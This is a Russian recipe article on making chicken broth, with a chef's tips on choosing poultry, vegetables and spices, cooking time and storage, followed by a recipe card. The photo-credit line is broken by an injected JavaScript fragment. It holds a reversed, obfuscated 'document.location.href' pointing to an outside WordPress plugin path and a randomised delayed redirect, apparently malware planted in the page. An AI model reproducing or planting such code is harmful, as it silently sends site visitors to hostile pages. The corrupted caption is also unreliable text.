Идеальный куриный бульон приготовить совсем не сложно. Важно выбрать хорошую курицу и варить, сколько нужно. Секретами вкусного бульона делится Никита Мальцев, шеф-повар «Дома культур».
На фото: Никита Мальцев
Из чего лучше варить бульон
— Лучший бульон готовится из целых кур, которые росли на свободном выгуле и питались в естественной среде. Из бройлерных кур вкусный бульон не получится.
На три литра супа понадобится одна курица. Ещё хороший бульон получается из одних куриных лапок.
Куриный бульон рекомендуют врачи и диетологи. Куриное мясо считается диетическим, и бульон из него тоже. Бульон сбалансирован по питательным элементам: он содержит белок, жиры, углеводы, витамины группы B.
Что добавить
Добавьте в бульон немного кокосового или оливкового масла для вкуса и аромата. Ещё хороши овощи и специи: фенхель, стебель сельдерея, лук-порей, морковь, грибы, лавровый лист, белый перец, душистый перец, стебли петрушки или кориандра.
Овощи помогают сделать бульон прозрачным.
Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com
Сколько варить
Варить курицу следует 3-4 часа. Сначала доведите до кипения и снимите пену, затем поставьте на слабый огонь на 3 часа. Варите с закрытой крышкой.
После того как бульон будет готов, выньте курицу и перелейте бульон в другую ёмкость.
Как хранить
Бульон можно перелить в вакуумные пакеты и хранить в морозилке в течение двух недель. В холодильнике храните бульон в кастрюле около трёх-четырёх суток.
40 calories
Классический куриный бульон
Его можно не только съесть с гренками, но и превратить в основу для супа, соуса или гарнира.
Классический куриный бульон
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
180 минут
PT3H
PT3H
КОЛИЧЕСТВО ПОРЦИЙ:
8 порций
КАЛОРИЙНОСТЬ:
40 ккал
Сложность
Время
180 минут
Кол-во порций
8 порций
Калорийность
40 ккал
Ингредиенты
Курица (целая)
1 шт.
Вода
3 л
Лук (репчатый)
1 шт.
Морковь
1 шт.
Соль
1 щепотка
Перец
1 щепотка
Процесс приготовления
- Вымойте курицу и положите её в глубокую кастрюлю.
- Налейте воду так, чтобы она полностью покрывала курицу. Добавьте соль.
- Морковь и лук вымойте и очистите. Морковь нарежьте на несколько частей, лук оставьте целым или разрежьте пополам.
- Поставьте кастрюлю на медленный огонь.
- Через 1,5 часа добавьте в бульон морковь, лук и перец.
- Варите ещё 1,5 часа.
- Выньте все ингредиенты из готового бульона и процедите его через марлю.
- Варёную курицу и овощи можно использовать в других блюдах.
Статьи по теме
Рецепт дня: суп с лапшой, курицей и яйцом
Самый полный гид по лапше: что нужно знать и что из неё приготовить
Рецепт дня: тёплый салат с курицей и баклажанами
6 самых полезных видов салата